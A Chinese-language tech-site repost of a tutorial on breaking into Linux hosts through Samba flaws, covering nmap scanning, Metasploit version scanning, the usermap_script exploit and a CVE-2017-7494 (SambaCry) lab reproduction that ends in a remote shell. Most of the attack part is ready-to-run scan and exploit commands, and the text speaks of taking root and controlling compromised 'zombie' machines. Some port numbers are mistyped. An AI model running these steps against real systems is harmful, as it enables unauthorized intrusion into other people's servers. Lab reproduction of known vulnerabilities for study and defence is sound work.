IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> 利用 samba 服务漏洞入侵Linux主机 -> 正文阅读

[系统运维]利用 samba 服务漏洞入侵Linux主机

利用 samba 服务漏洞入侵Linux主机(CVE-2017-7494 与 samba 低版本漏洞利用)

Samba 是在Linux 和 UNIX 系统上实现 SMB协议的一个免费软件,由服务器及客户端程序构成 Samba 服务对应的端口有 139、445等等,本文将简单介绍 metasploit 利用 samba 漏洞入侵进入远程Linux主机

1、首先要扫描目标主机上开放的端口和服务,用 nmap命令如下:
nmap -sS -Pn -A 192.168.0.142
2、发现主机上开放的139,145端口之后,说明该主机有可能存在samba 服务远程溢出漏洞,尝试通过该端口建立一个 meterpreter会话,需要用到 metasploit
3、打开 metasploit 之后需要先判断samba的版本,命令如下:
msf> search scanner/samba
这条命令用来查找 samba 相关 exploit参数
4、然后使用如下命令来定义要扫描 samba 的版本所用到的 exploits 参数
msf> use auxiliary/scanner/smb/smb_version
msfauxiliary(smb_version) > set RHOSTS 192.168.0.102
这条命令定义你将要扫描 samba 版本的远程主机的IP 地址
5、发现 samba 版本之后,我们需要进一步利用来入侵进入到远程 Linux主机
msf exploit(usermap_script) > set RHOST 192.168.0.102
msf exploit(usermap_script) > exploit
执行完成以上命令如图所示,成功创建了 shell 会话

smb 其他漏洞 Linux smb漏洞(CVE-2017-7494)复现

  • 漏洞编号:CVE-2017-7494
  • 漏洞等级:严重
  • 影响版本:漏洞影响了 Samba 3.5.0 之后的版本不包含 4.6.4/4.5.10/4.4.14
  • 0x01:查看 samba版本打开samba 配置文件添加以下配置。
  • root@kali:~# samba -V
  • vi /etc/samba/smb.conf
[public]
	comment = public
	browseable = yes
	writeable = yes
	path = /tmp/public
	public = yes
	read only = no
[homes]
	comment = Home Directories
	browseable = no
  • 0X02:Kali Linux 里面创建 Samba 共享目录

创建共享目录
root@kali:~# mkdir /tmp/public
修改读写执行权限
root@kali:~# chmod 777 /tmp/public/
这是 SambaCry 漏洞利用的前提,必须有一个共享目录,这样攻击者就可以在这个共享目录传递攻击代码并执行,获取到 Root权限并控制肉鸡

  • 0x03:Kali Linux 重启/启动 Samba 服务

重启 samba 服务
root@kali:~# /etc/init.d/ samba restart
查看 samba 进程
root@kali:~# ps aux | grep samba
查看 samba 端口状态(采用 139445 端口)
root@kali:~# netstat -tnlp samba

  • 0x04:更新 MSF 后使用 “exploit/linux/samba/is_known_pipename” 利用模块,设置 rhost 后直接 exploit 即可得到 shell
    **注意!**有的 poc 可能会存在 64位 和 32位之分

msf5> use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > show options
msf5 exploit(linux/samba/is_known_pipename) > check
msf5 exploit(linux/samba/is_known_pipename) > set rhost xxx / set rport xxx / run / exploit

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2022-09-21 01:04:54  更:2022-09-21 01:07:47 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 9:20:35-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码